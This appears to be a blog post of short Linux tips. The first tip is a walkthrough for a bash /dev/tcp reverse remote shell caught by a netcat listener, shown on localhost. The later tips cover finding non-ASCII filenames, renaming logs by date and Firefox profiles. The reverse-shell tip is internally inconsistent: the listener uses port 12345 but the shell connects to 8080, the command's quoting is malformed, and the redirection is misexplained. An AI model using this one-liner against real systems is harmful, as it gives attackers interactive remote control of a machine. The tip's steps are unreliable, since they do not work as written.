Tip: Quick and dirty reverse remote shell

Here is how to get reverse remote shell. I say reverse because the remote system is connecting to you. I'll demonstrate it on a single machine for simplicity. So, open a terminal and run the following command in it:

nc -l 12345

This will start netcat which will listen on port 12345. Then, in the second terminal, run the following command:

/bin/bash -c bash -i >& /dev/tcp/127.0.0.1/8080 0>&1

You won't notice anything in the first window where nc command is running, but try to enter some command there, e.g. pwd. :) What you've got, is remote shell. Obviously, because of the way things work you don't get prompt and other fancy stuff, but it works and that's important. :)

What you basically did is that you run interactive bash process (the option -i) with standard error and standard output redirected to /dev/tcp/127.0.0.1/8080 (redirection operator >&) and also standard output being redirected to the same file (the last 0>&1). The file being redirected to and from is a special notation for the bash shell that allows it to open connections, i.e. the syntax is:

/dev/<protocol>/<ipaddress>/<port>

More details can be found in bash manual page.

Short Tip: Find files with non-printable ASCII characters

I have a directory full of different files obtained from the Internet and it turned out that some of them contain UTF-8 characters because of which indexing didn't work. So, I had to find all files that contain such characters. The solution I found was the following one:

LC_ALL=C find . -name '*[! -~]*'

This command will print all filenames with embedded unicode characters represented as question marks. Few facts about this command:

1. Assignment (LC_ALL=C) temporarily switches to C locale during the execution of find(1) command. The effect of this is that find(1) will not interpret multibyte utf8 characters, but strictly byte-per-byte input.
2. find(1) will then search for file name that don't contain printable ASCII characters. To see this, take a look at a glob pattern. First and last star mean that the square brackets can be anywhere within the file name. Square bracket, on the other hand, specifies class of characters outside (exclamation negates range) of a range from space (ASCII code 32) to tilde character (ASCII code 126).

The output of find(1) command will include question marks in places where byte (ASCII char) has a value below 32 or above 126. In order to see what unicode character is in the particular place, you can pipe output to, e.g. cat(1) command, like this:

LC_ALL=C find . -name '*[! -~]*' | cat

This will work because cat(1) command will have unicode encoding selected (the value of the variable LC_ALL isn't changed for it) and will properly interpret and output multibyte sequences used in utf8 coding. Actually, if you want to nitpick, cat isn't going to interpret anything but will initialize terminal to properly handle utf8 characters which will do actual interpretation. 

Short Tip: Renaming log files to include date...

I had a bunch of a log files in the format logfilename.N.gz, but I wanted to rename them into logfilename.YYYYMMDD.gz where YYYYMMDD is a date when the file was last modified. I did it using the following for loop:

for i in logfilename.*.gz
do
    mv -i $i logfilename.`date -r $i +%Y%m%d`.gz
done

The argument -r to date(1) command tells it to use the last modification date (mtime) of a file given as the argument to the option. Note that it is also possible to use stat(1) command instead of date(1).

Using multiple instances of Firefox...

Firefox has a great feature called Profiles. You can use them to have multiple instances of a browser. If you wonder why would you use something like that, here are few reasons:

• you might want to separate professional from private browsing, or to have development or hacking environment distinctive from "usual" environment.
• you might want to try out some new plugin without messing up your existing profiles.
• you have large number of installed plugins that considerably slow down the browser, or can even make it unresponsive, so you want to group them in different instances.

When you start the browser by running firefox command, either from command line or from GUI launcher, it will find existing running instance of browser and activate it. So, in order to be able to run new instance you have to use command line option --no-remote. Also, to select other than default profile, use -P option. In case you don't give an argument to this option the firefox will start with profile selection dialog. In this dialog you'll be able to select profile that should be run, but you can also create new profiles and delete existing ones.

For the end, I mentioned in the introduction that in different profiles I use different plugins. But NoScript plugin I use in every instance as I regard it one of the most important security additions to the browser. I strongly recommend that you install this plugin too!